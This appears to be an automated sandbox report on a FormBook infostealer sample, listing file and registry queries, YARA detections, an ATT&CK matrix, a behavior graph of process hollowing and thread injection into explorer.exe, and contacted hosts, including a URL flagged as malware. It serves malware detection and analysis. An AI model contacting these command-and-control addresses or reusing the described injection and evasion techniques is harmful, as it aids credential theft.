            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery221Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing13Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 501991 Sample: iAuPyHuUkk Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->38 40 Found malware configuration 2->40 42 Malicious sample detected (through community Yara rule) 2->42 44 7 other signatures 2->44 10 iAuPyHuUkk.exe 6 2->10         started        process3 file4 30 C:\Users\user\AppData\...\iAuPyHuUkk.exe.log, ASCII 10->30 dropped 56 Tries to detect virtualization through RDTSC time measurements 10->56 14 iAuPyHuUkk.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 Queues an APC in another process (thread injection) 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 32 www.cyebang.com 154.216.110.149, 49827, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 17->32 34 www.xn--aprendes-espaol-brb.com 217.160.0.226, 49826, 80 ONEANDONE-ASBrauerstrasse48DE Germany 17->34 36 5 other IPs or domains 17->36 46 System process connects to network (likely due to code injection or exploit) 17->46 21 control.exe 17->21         started        24 autofmt.exe 17->24         started        signatures10 process11 signatures12 48 Self deletion via cmd delete 21->48 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 26 cmd.exe 1 21->26         started        process13 process14 28 conhost.exe 26->28         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            iAuPyHuUkk.exe15%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            3.2.iAuPyHuUkk.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://i4.cdn-image.com/__media__/pics/27586/searchbtn.png)0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.woff0%Avira URL Cloudsafe
            http://www.vintagepaseo.com/display.cfm0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/pics/27587/Left.png)0%Avira URL Cloudsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.eot0%Avira URL Cloudsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp//e0%Avira URL Cloudsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.carterandcone.com0%URL Reputationsafe
            http://www.cyebang.com/mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5100%Avira URL Cloudmalware
            http://i4.cdn-image.com/__media__/pics/27587/Right.png)0%Avira URL Cloudsafe
            http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.zhongyicts.com.cnava0%Avira URL Cloudsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://i4.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff20%Avira URL Cloudsafe
